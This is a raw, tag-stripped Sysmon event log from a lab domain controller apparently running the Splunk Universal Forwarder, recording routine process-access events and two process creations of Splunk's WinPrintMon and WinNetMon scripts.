13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4201-000000009101}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.165{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4201-000000009101}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.167{10ACEC4A-85ED-5FCF-4201-000000009101}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4101-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4101-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.056{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4101-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.058{10ACEC4A-85ED-5FCF-4101-000000009101}4296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.524{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4801-000000009101}664C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4801-000000009101}664C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 